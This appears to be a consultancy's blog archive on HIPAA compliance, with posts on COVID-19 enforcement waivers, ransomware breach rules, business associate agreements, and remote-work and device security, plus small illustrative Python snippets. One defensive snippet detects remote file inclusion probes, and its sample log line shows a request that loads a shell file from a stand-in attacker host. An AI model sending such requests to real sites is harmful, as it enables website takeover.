Chris Apgar, CISSP, CCISO
On April 2, 2020, the Office for Civil Rights (OCR) at the U.S. Department of Health and Human Services (HHS) announced that, effective immediately, it will exercise its enforcement discretion and will not impose penalties for violations of certain provisions of the HIPAA Privacy Rule against health care providers or their business associates for good faith uses and disclosures of protected health information (PHI) by business associates for public health and health oversight activities during the COVID-19 nationwide public health emergency. The notification can be found here.
Why is this further “enforcement discretion” a new thing? Because the HIPAA Privacy Rule already permits covered entities to disclose PHI for public health purposes, including as it relates to communicable diseases. It doesn’t permit business associates to do the same, though. During the COVID-19 pandemic, however, BAs may disclose PHI to public health officials or health oversight agencies without fear of being penalized.
What types of Business Associates can disclose PHI?
AKA, Does the OCR “enforcement discretion” apply to you?
Business partner Julia Huddleston and I had to think a bit about what types of business associates would be in a position to disclose PHI under this new relaxing of the rules. We identified several who may be able to make these disclosures:
- Telehealth vendors
- Population health vendors
- Group health plan third party administrators (among others)
That said, business associates still need to pay attention to disclosures! Enforcement relaxation is not intended to give BAs broad permission to disclose PHI. Such disclosures are permitted only in connection with treating those impacted by COVID-19, reporting where cases are appearing and so forth. Even then, if it is possible, the PHI should be de-identified. At the very least, such disclosures need to be kept to the minimum necessary.
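To make the de-identification point concrete, here is a minimal Python sketch that strips direct identifiers from a record before a public health disclosure. The field names are hypothetical, and the identifier list is deliberately abbreviated; a real de-identification effort must follow the HIPAA Safe Harbor or Expert Determination methods, not this short list.

```python
# Hypothetical field names; the identifier set below is a partial,
# illustrative subset -- NOT the full Safe Harbor list of 18 identifiers.
DIRECT_IDENTIFIERS = {
    "name", "address", "phone", "email", "ssn", "mrn", "birth_date",
}

def deidentify(record: dict) -> dict:
    """Return a copy of the record with direct identifiers removed."""
    return {k: v for k, v in record.items() if k not in DIRECT_IDENTIFIERS}

record = {
    "name": "Jane Doe",
    "ssn": "123-45-6789",
    "county": "Multnomah",
    "covid_test_result": "positive",
}
# Identifiers are stripped; county and test result remain for reporting.
print(deidentify(record))
```

Even after a pass like this, the minimum necessary standard still applies to whatever fields remain.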
During the pandemic, covered entities and business associates have more latitude when it comes to the use and disclosure of PHI. Keep in mind that this is a temporary situation. After the national emergency is lifted, enforcement will resume. This means that business associates will no longer have the latitude to disclose PHI to public health officials and health oversight agencies. The current action is similar to the relaxing of enforcement related to the use of platforms like FaceTime for telehealth. For more information about OCR’s COVID 19 resources click here.
Are your policies & procedures up to the risks of a suddenly extended remote workforce? Now is a great time to double-check how relevant yours are for security standards, device use and more. Please call or email if you need help – and stay safe!
Novel Coronavirus, aka COVID-19, is on track to stretch our healthcare system to the breaking point, and our healthcare providers along with it. Effective March 15, 2020, OCR published a Limited Waiver of HIPAA Sanctions and Penalties that, during this National Emergency, could give care providers one less source of anxiety as they work to save lives.
What the Limited Waiver means to hospitals, emergency rooms & you
Although HIPAA remains in force, the very nature of responding to care demands places a huge strain on healthcare providers. Extraordinary circumstances call for extraordinary measures.
To help reduce the concern of potential financial penalties, the HHS Secretary has (as per the issued publication) “exercised the authority to waive sanctions and penalties against a covered hospital that does not comply with the following provisions of the HIPAA Privacy Rule”:
- the requirements to obtain a patient’s agreement to speak with family members or friends involved in the patient’s care
See 45 CFR 164.510(b)
- the requirement to honor a request to opt-out of the facility directory
See 45 CFR 164.510(a)
- the requirement to distribute a notice of privacy practices
See 45 CFR 164.520
- the patient’s right to request privacy restrictions
See 45 CFR 164.522(a)
- the patient’s right to request confidential communications
See 45 CFR 164.522(b)
Don’t forget the defining word is “limited.” The limited waiver only applies until the President of the United States or the HHS Secretary terminates the national emergency status. From that point on, the HIPAA Privacy Rule and associated potential penalties are reinstated. Also remember that, national emergency or no, disclosures of personal information are allowed to disaster relief organizations, like the American Red Cross. That leniency lets them notify loved ones of your location. Also keep in mind that the waiver applies only to hospitals, including their emergency rooms. Other covered entities – like doctors and health plans – still must comply with all Privacy Rule requirements.
- On COVID-19, please visit: https://www.coronavirus.gov or https://www.cdc.gov/coronavirus/2019-ncov/index.html
- Regarding HIPAA and COVID-19, view the HHS Office for Civil Rights’ (OCR) March 16, 2020, Bulletin on the HIPAA Waiver here: https://www.hhs.gov/sites/default/files/hipaa-and-covid-19-limited-hipaa-waiver-bulletin-508.pdf
- View the Waiver or Modification of Requirements under Section 1135 of the Social Security Act as the result of the consequences of the 2019 Novel Coronavirus at: https://www.phe.gov/emergency/news/healthactions/section1135/Pages/covid19-13March20.aspx
- For how the HIPAA Privacy Rule applies in an emergency, visit the OCR’s HIPAA Emergency Preparedness, Planning, and Response page, or use the HIPAA Disclosures for Emergency Preparedness Decision Tool.
Contact Apgar & Associates for consulting expertise in privacy, information security, HIPAA, HITECH and regulatory compliance. We also guide you through the what and the how of preparation for HITRUST, SOC2 and ISO certifications.
As we cope with the COVID-19 pandemic, it’s important to take a few extra measures to protect your organization, your patients and clients, and your data. Teleworking is now widely adopted to prevent further spread of the virus, with more and more individuals working remotely. Now is a good time to address the risks that come with working remotely, especially if workstations are not owned by your organization.
Minimum Employee Needs for Secure Remote Work
As you prepare yourself and your teams for expanded teleworking here’s a checklist of what you need to do to reduce the risks associated with mobile device use that may be outside of what you would normally permit. If employees will be using their own devices and working remotely, at a minimum they need the following:
- A secure router connection, either cabled or wireless secured with WPA2
- A strong home router password
- A strong device password
- Up-to-date antimalware and firewall software
- Up-to-date patching on the device used
- If connecting to your network, a secure connection to the network (e.g., VPN, TLS, HTTPS)
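On the last checklist item, one easy thing to verify is that any tooling your remote workers rely on actually enforces certificate checking. As a small sketch, Python’s standard `ssl` module creates contexts that verify both the server certificate and the hostname by default; disabling either silently downgrades the connection.

```python
import ssl

# Python's default SSL context enforces certificate and hostname
# verification -- the baseline for the "secure connection" item
# (VPN, TLS, HTTPS) on the checklist.
context = ssl.create_default_context()
print(context.verify_mode == ssl.CERT_REQUIRED)  # True
print(context.check_hostname)                    # True
```

If in-house scripts set `verify_mode` to `CERT_NONE` or turn off `check_hostname` to “make an error go away,” that’s a finding worth fixing before expanding remote work.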
If employees are using a company laptop, require the use of a secure connection with a strong password. It’s also a good idea to make sure that all of the above are addressed if company workstations will be used. Patching is important to prevent vulnerabilities from being exploited by cybercriminals.
One last caution: Phishing. Now more than ever employees need to be reminded to beware of phishing activity. There are a number of known phishing attacks associated with COVID-19. Social engineering can result in a breach, ransomware attacks and other damage to your infrastructure and data. It’s a good idea to point employees to the CDC and other reputable sources so they know what sites are safe to visit. That way they can remain up to speed on what’s happening with the pandemic, with less risk.
As was said in every episode of Hill Street Blues, stay safe out there!
When you’re making on-the-fly revisions and updates to your policies and procedures during this critical time, you want to help them stick. A tip: make sure they state what you will do, not just what you can do. “If you say it, do it. If you do it, write it down.” Call on Apgar & Associates at 503-384-2538 for help with privacy and information security fundamentals as well as strategic planning.
It’s one of those questions that never goes away. The answer is, “Maybe” and very definitely, “Not always.” Contrary to popular belief, even after a ransomware attack, the safe harbor still applies when it comes to breaches. If your PHI was encrypted prior to the ransomware attack that encrypted (aka “held for ransom”) it, you may very well not have suffered a breach, which means there may be no need to conduct a four-factor risk assessment.
If only it could be so simple. However, per OCR’s weigh-in, you do need to ascertain that the data attacked was encrypted at the time. If it was encrypted, it’s a security incident, but not a data breach. I’ll dig into that shortly. Far too often I see posts and blogs that adamantly declare, “If a ransomware attack occurs, it must be a breach.” Not so fast. It’s not so black and white.
OCR has stated that it’s a fact-based determination as to whether or not a breach occurred. If a breach, then you do need to notify OCR, individuals and potentially, the media. If you run into a consultant (and sometimes counsel) who states that all ransomware attacks absolutely equal a breach, get a second opinion.
Data Encryption & the Burden of Proof
Here’s the flip side – when encrypted PHI may become unsecure, representing a breach due to a ransomware attack. Keep in mind that when you’ve powered up and logged in to your laptop or other mobile device, data may be unencrypted at the time because you’re accessing the data. When ransomware hits and those files are unencrypted at the time of the attack, you may have a breach of unsecured PHI on your hands.
But – if you do use full disk encryption and your laptop was not turned on (which means its drive remained encrypted), or if no files were unencrypted at the time of the attack, the PHI was not compromised. No breach occurred.
Also, if the ransomware attack hits your backup media, encrypted at the time of the attack, there is a high likelihood that no PHI breach occurred. Triple-check to be sure and be able to prove it if OCR comes to call. The burden of proof lies with you.
The burden of proof is greater under other circumstances, like when a ransomware attack occurs and PHI is not encrypted. At that point, you absolutely need to conduct a four-factor risk assessment. It bears mentioning, though, that if you have top talent forensic analysts who can prove that no PHI was siphoned off, you still may not be required to notify OCR or individuals because the PHI was not compromised.
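For teams that want to document that fact-based determination, here is a minimal sketch of the four factors from the Breach Notification Rule (45 CFR 164.402) as a data structure. The decision helper is purely illustrative; the real determination is fact-based and should involve your privacy officer and counsel, not a boolean flag.

```python
from dataclasses import dataclass

@dataclass
class FourFactorAssessment:
    # Factor 1: nature and extent of the PHI involved
    phi_nature_and_extent: str
    # Factor 2: the unauthorized person who used or received the PHI
    unauthorized_recipient: str
    # Factor 3: whether the PHI was actually acquired or viewed
    phi_actually_acquired: bool
    # Factor 4: the extent to which the risk has been mitigated
    risk_mitigated: bool

    def low_probability_of_compromise(self) -> bool:
        # Illustrative logic only: if forensics show no PHI was actually
        # acquired or viewed and the risk has been mitigated, the
        # probability of compromise may be low enough that notification
        # is not required. Real assessments weigh all four factors.
        return (not self.phi_actually_acquired) and self.risk_mitigated

assessment = FourFactorAssessment(
    phi_nature_and_extent="names and appointment dates, no SSNs",
    unauthorized_recipient="unknown ransomware operator",
    phi_actually_acquired=False,  # e.g., forensics show no exfiltration
    risk_mitigated=True,
)
print(assessment.low_probability_of_compromise())  # True
```

Writing the assessment down this way also helps with the burden of proof: each factor is recorded, dated, and reviewable if OCR comes to call.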
Clearly, it’s not a simple black and white, yes or no answer to the breach question. Be careful. Preserve all evidence. Look closely at the circumstances to make sure no breach occurred that requires notification. But if a consultant or counsel, going on the basis of a blog post, says that you absolutely must notify because ransomware attacks always equal a breach, don’t take my word for it. Just ask OCR.
Compliance Planning includes the “what to do” in the case of a security incident and data breach. Chris Apgar, CISSP and Julia Huddleston, CIPP, CIPM, work with clients nationwide on HIPAA privacy and security compliance, and address the need for assistance with expanded use of electronic health information exchange. They also prep clients for the rigorous process of HITRUST, SOC2 and ISO certifications.
Are you sure your medical records aren’t accessible by outsiders? Maybe check your perimeter security. I’m not talking about fancy technical security gadgets, but the simple, obvious things like setting a password on your internet-facing applications.
Here’s why I ask. Did you hear about the 187 medical system servers not protected by passwords or necessary perimeter security measures? Thank the recent ProPublica investigation for that bombshell. An example: with just a simple data query, a MobilexUSA server exposed the names of more than a million patients! The investigation uncovered the release of names, birthdates, and in some cases, Social Security numbers.
Get back to the basics. Avoid the obvious errors like
- leaving default passwords on servers (ask the State of Utah about their massive breach),
- not setting passwords at all and other blatant mistakes.
You lose patient trust, and you lose money. There are notification costs, harm to your reputation, not to mention significant OCR fines. Another big expense? The regulators’ imposed corrective action plans (CAPs).
Let’s look at the password issue alone. Basic perimeter security doesn’t stop at the need to change default server passwords, and to set up an original password. Take it up a notch. Make sure the passwords you set aren’t easy to guess. Get complex. For cybercriminals, it doesn’t take a lot of computing power to crack a simple password. Take it for granted that you need to set complex passwords on all of your devices.
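To see why complexity matters, here is a rough sketch of the brute-force search space for two password policies, measured in bits. The math assumes the attacker knows which character classes are in use; every added character and every added character class grows the search space multiplicatively.

```python
import math

def search_space_bits(length: int, alphabet_size: int) -> float:
    """Bits of brute-force search space: length * log2(alphabet size)."""
    return length * math.log2(alphabet_size)

# 8 lowercase letters vs. 14 characters drawn from mixed-case
# letters, digits and printable symbols (~94 characters).
simple = search_space_bits(8, 26)     # ~37.6 bits
complex_ = search_space_bits(14, 94)  # ~91.8 bits
print(round(simple, 1), round(complex_, 1))
```

Each extra bit doubles the attacker’s work, so the gap between ~38 and ~92 bits is the difference between a password cracked on commodity hardware and one that isn’t worth the electricity.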
Too often, it’s the simple things that get you. If simple mistakes are why your data is exposed to the internet, you’re setting your organization up for an OCR finding of willful neglect. That will definitely lead to civil penalties or monetary settlements. Remember, fancy technology isn’t your biggest risk; it’s people and easy mistakes with significant implications.
No doubt, limited resources are an issue for smaller healthcare organizations like small clinics and health information technology (HIT) startups. On the other hand, the adverse impact of not attending to even simple things can put smaller organizations out of business. If you’re a smaller organization, or just not sure where to start, try the Office of the National Coordinator for Health Information Technology (ONC). There are plenty of no-cost resources available, like the toolkit for providers. Tackling perimeter security can be overwhelming, which is why it’s essential to start small, with the basics.
Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally known speaker and author. He most recently authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT. Chris is also a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law, and electronic health information exchange.
Isn’t it rewarding when a fellow security professional posts about an attempted hack of his personal website that he turned into a lesson in website security? And in the end, hacked the hacker? That’s exactly what happened with Larry Cashdollar, a senior security response engineer at Akamai. Cashdollar noticed something peculiar in the logs on his personal website. He dug further and turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.
Before diving into the details: if you’re not sure what an RFI vulnerability is, definitely ask your web development and website management team whether they’re aware of this type of vulnerability. If they don’t know, they need to do some research to prevent hacking attacks on your websites. You can satisfy your curiosity – and share with your web team – this link to more information about it.
On to the Hacking Attempt
Larry Cashdollar told The Register his site’s logs showed that a would-be attacker was probing for RFI holes to trick web applications into running a remote malicious script. The hacker was trying to load a file using a custom tool that Cashdollar had created (!).
The hacker’s probe was a generic test used against websites: figure out what input the site accepts, supply a web address as that input, and see whether the site will execute it. Unfortunately for the attacker, Cashdollar used the tool’s logs to trace back to the file the attacker was trying to load. Then Cashdollar assessed that and other files the hacker had ready to execute to take over vulnerable websites, and was able to extract the criminal’s email address and their preferred language – Portuguese.
What was the purpose of the RFI vulnerability probe? The attacker wanted to install phishing pages that masqueraded as a legitimate bank’s login webpage, and then direct victims to the hacker’s page to collect bank account credentials. This was a way around installing more sophisticated code to capture cryptocurrency. It was just a matter of redirecting someone to a malicious site, because the initial fake webpage looked legitimate.
3 Big Takeaways from the RFI Vulnerability Probe
Score one for the good guys! In this case, the security professional caught and tracked down the attacker. We should take it as an alert for the professionals who are responsible for monitoring website security. From Cashdollar’s account of the incident, the big takeaways for website administrators are the importance of:
- Diligently monitoring the audit logs
- Following a solid patching program for site management tools
- Writing web code that cannot be exploited for RFI and other known vulnerabilities.
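On the first takeaway, the tell-tale sign Cashdollar spotted – a request parameter whose value is itself a URL – is easy to scan for. Here is a minimal sketch that flags such lines; the log format and parameter names are simplified assumptions, and real logs deserve a proper parser, not just a regex.

```python
import re

# A request parameter whose value starts with a URL scheme is a
# classic sign of remote file inclusion (RFI) probing.
RFI_PATTERN = re.compile(r"[?&][\w\-]+=(?:https?|ftp)://", re.IGNORECASE)

def find_rfi_probes(log_lines):
    """Return the log lines whose query string carries a URL as a value."""
    return [line for line in log_lines if RFI_PATTERN.search(line)]

logs = [
    "GET /index.php?page=about HTTP/1.1",
    "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1",
]
print(find_rfi_probes(logs))  # only the second line is flagged
```

A scan like this is no substitute for patching and safe coding, but it turns “diligently monitoring the audit logs” from a slogan into a daily cron job.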
If your website developers and administrators don’t know and don’t watch, you may not be as lucky as Cashdollar.
Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law and electronic health information exchange. A nationally known speaker and author, Chris authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT.
Ever run into a vendor who claims to be a conduit versus a business associate (BA)? It happens all too often, in my experience. Here’s the problem: the conduit exception is a narrow one. If you’re storing PHI data, even encrypted PHI where you don’t have the encryption key, you’re a BA. Sign the Business Associates Agreement (BAA); it applies to you.
Not convinced? Let’s look at the preamble to the Omnibus Rule of 2013. HHS said, “The conduit exception is a narrow one and is intended to exclude only those entities providing mere courier services, such as the U.S. Postal Service or United Parcel Service and their electronic equivalents, such as internet service providers (ISPs) providing mere data transmission services. As we have stated in prior guidance, a conduit transports information but does not access it other than on a random or infrequent basis. Thus, document storage companies maintaining protected health information on behalf of covered entities are considered business associates, regardless of whether they actually view the information they hold.”
With that HHS summary in mind, you can see it’s pretty difficult to market services and storage to the healthcare industry without a BAA and think you won’t run afoul of HIPAA. Yet even as recently as a few years ago, our privacy and information security firm would encounter storage vendors and document sharing vendors who would not sign a business associate agreement. Again, just because you can’t access the PHI doesn’t mean you’re not a business associate.
In OCR’s May 2019 guidance, you’ll find a list of BA liabilities. Those remind BAs of their compliance responsibilities in regard to HIPAA regulations. OCR’s reminder list also notes that BAs have a duty to execute a business associate agreement with their BA subcontractors. What isn’t mentioned, but is required, is that covered entities (CE) and BAs must execute a BAA with each other. So if you’re not an internet service provider (ISP), or the US Postal Service (and the like), plus you store PHI, you need to execute a BAA to be in compliance with HIPAA regulatory requirements.
I’ll end with a cautionary note about vendors convinced they aren’t a business associate. Covered Entities, if your vendor is unwilling to sign a BAA, yet they have access to your PHI, it’s probably a good idea to find another vendor. It may be that your vendor who stores paper charts or other PHI doesn’t realize that they’re a business associate. Or it could be that, in the case of a storage unit, the storage facility owners simply don’t know what’s being stored. But if PHI is involved, then you need to execute a business associate agreement.
Whether you’re a physician practice, a medical transcription service, or a TPA providing a health plan with claims processing services, you’re dealing with HIPAA compliance. Give us a call: 503-384-2538 for help to assure you’re on top of it.
By now you’ve likely heard that Amazon is moving into the HIPAA space with Alexa. In conjunction with their partners, they’re launching what Amazon calls “HIPAA compliant” apps. If only it were that easy to create a HIPAA covered app, or as Amazon calls it, skill. As with Amazon Web Services (AWS) it’s ultimately up to the individual developers to honor the law. While Amazon may well be a trusted third party, if developers don’t build apps or “skills” with privacy, security and HIPAA compliance in mind, I wouldn’t trust Alexa with any of my healthcare data.
Having worked with a number of software development companies in the healthcare space, I can tell you that more often than not developers want to create cool and useful things. The problem with that is cool and useful don’t always automatically align with security and privacy needs. In fact, in the development process you won’t often find security and privacy at the top of the priority list.
Time, Trust & Alexa Users
Trust but verify, folks. If I were the covered entity or business associate planning to eventually trust the Amazon platform to adequately secure protected health information, I would want assurances and proof that the developers of any app/skill have privacy and security baked in.
Granted, Amazon has indicated that trust takes time to build. That it will be a while before patients widely trust Alexa with sensitive health information. Ok, let’s say we’re down the road a way. Trust has been earned. Now we face another potential issue that has nothing to do with the platform or any of its available apps/skills. The concern lies with the end users. End users are not always savvy when it comes to protecting sensitive personal information. I think this is where there’s a definite need for some education on the part of partners, Amazon and healthcare providers.
Right now, when Alexa is on, it listens to all voices in the room, all the time. How awful would it be if an end user thought he or she was taking advantage of touted HIPAA compliant solutions but instead was airing sensitive information using another Alexa app? Hopefully Alexa will also be smart enough to not broadcast protected health information like “You need to follow up with your [insert-private-condition-here] specialist” to the whole house.
Alexa (Amazon), are you listening?
Consumers on the warpath to protect personal data privacy are making strides in state houses. For instance, here’s an update on Oregon’s Senate Bill 703 regarding selling health information. If you use Big Data at all, you’ve probably been following this Bill. It basically says that anyone selling personal health information, even thoroughly de-identified, would need to pay the source, i.e., you and me, for the privilege. As you may imagine, research groups and analysts who may touch any Oregonian’s de-identified PHI, not to mention privacy officers at the source of de-identified data, are watching this closely.
You can likely thank Facebook backlash for this Bill. Taking personal data and sharing it without user knowledge has caused huge problems for the social media giant. Now we’re hearing that they’re going to reel it all in, but how do you get the genie back in the bottle? The trust is gone, and SB 703 is just one instance of how outraged consumers are at how data is being used.
From a compliance perspective, the information, aka personal data, is already de-identified PHI, so that’s not the basis for the Bill. It’s a clear call for personal data privacy protection beyond anything we’ve seen up to now. You can also look at the yet-to-go-live California Consumer Privacy Act as another example of privacy protection taken to the Nth degree.
This isn’t to say that personal data privacy isn’t important because it absolutely is, it’s merely to point out that the logistical reality of complying with either SB 703 or CCPA is a nightmare we’ve yet to face. You can hardly blame people for playing ostrich when confronted with such a daunting task. You can also hardly blame people for pushing back on companies being able to use personal information for free.
We’ll be writing more on CCPA and its potential effect on business operations both outside and within the healthcare environment. In the meantime, should Oregon’s SB 703 move further down the path to fruition, we’ll weigh in on that, too.
Need specialized insight on these and other data privacy and information security regulations? Contact Apgar & Associates, LLC at 503-384-2538. Our in-the-trenches knowledge and professional consulting will help you and your workforce with compliance and critical certification preparation.
When your goal is to protect PHI on laptops and mobile devices, keep in mind that information security is only as strong as its weakest link. Lenient information security standards exponentially increase the risk to sensitive healthcare data. They can also place you in non-compliance with the HIPAA Security Rule. On top of that, the courts are likely to see them as a security failing in the case of a data breach. Now you’re looking at an expensive lawsuit!
An abbreviated overview of the HIPAA Security Rule’s general requirements calls for covered entities and business associates to do the following:
- Ensure the confidentiality, integrity, and availability of all electronic protected health information the covered entity or business associate creates, receives, maintains, or transmits.
- Protect against any reasonably anticipated threats or hazards to the security or integrity of such information.
- Protect against any reasonably anticipated uses or disclosures of such information that are not permitted or required under Subpart E of this part.
Can you demonstrate device encryption?
CEs and BAs, keep in mind, too, that you can’t take advantage of the HIPAA Breach Notification Rule safe harbor if you can’t demonstrate that stolen devices were actually encrypted at the time. If the device isn’t locked down, it’s hard to prove that the device was secure and that no PHI or PII was accessed when the device was lost or stolen. While Apple tablets and smartphones are natively encrypted, either end users or IT staff need to enable encryption for Android tablets and smartphones, Windows laptops, tablets and smartphones, and Macs. Take the below steps to protect laptops, tablets and smartphones – and to protect PHI.
7 Steps to Laptop Data Security & Intrusion Protection
- Remove administrator privileges for all company-owned laptops and lock down devices
- Install and maintain mobile device management tools that support:
- Remote wipe of hard and flash drives
- Device tracking in the event a device is lost or stolen
- Enforce encryption of hard drives and flash drives
- Install and periodically update anti-malware applications
- Install and periodically update firewall applications
- Enforce strong passcodes or passwords and require periodic password changes
- Enable biometric authentication if available
- If using Windows, properly set share and Microsoft New Technology File System (NTFS) permissions to keep network snooping to a minimum and unauthorized users out of sensitive files stored locally
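On the encryption item above, demonstrating that a device was encrypted means capturing evidence, not just turning the feature on. As a minimal sketch, here is a Python helper that records the answer from Windows’ `manage-bde -status` output; the sample output below is abbreviated (the real command prints more fields), and macOS (`fdesetup status`) and Linux (LUKS/`lsblk`) have their own equivalents.

```python
def bitlocker_protection_on(status_output: str) -> bool:
    """Return True if manage-bde -status reports BitLocker protection on."""
    for line in status_output.splitlines():
        if "Protection Status:" in line:
            return "Protection On" in line
    return False

# Abbreviated, illustrative sample of manage-bde -status output.
sample = """\
Volume C: [OSDisk]
    Conversion Status:    Fully Encrypted
    Protection Status:    Protection On
"""
print(bitlocker_protection_on(sample))  # True
```

Logging this status per device, with a timestamp, is the kind of record that lets you claim the safe harbor when a laptop goes missing.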
6 Ways to Protect Tablet & Smart Phone Security & Prevent Intrusion
- Remove administrator privileges for all company owned tablets and smartphones and lock down devices
- Install and maintain mobile device management tools (company owned and personally owned; BYOD) that support:
- Remote wipe of flash drives
- Device tracking in the event a device is lost or stolen
- Enforce encryption of flash drives
- Preferably – segregate company data from personal data on BYOD devices
- Install and periodically update anti-malware applications (Exception: iPhones and iPads)
- Install and periodically update firewall applications (Exception: iPhones and iPads)
- Require strong passcodes or passwords and regular password changes
- Enable biometric authentication if available
Device hardening is considered a reasonable security safeguard, which means it’s a “must do” when it comes to HIPAA compliance and, in some states, state law compliance. Take the necessary steps to protect PHI and avoid the bad headlines, regulatory penalties, lawsuits and lost business. If you need to beef up compliance planning, conduct your security risk analysis, or just aren’t sure where to start with any of it, give us a call: 503-384-2538.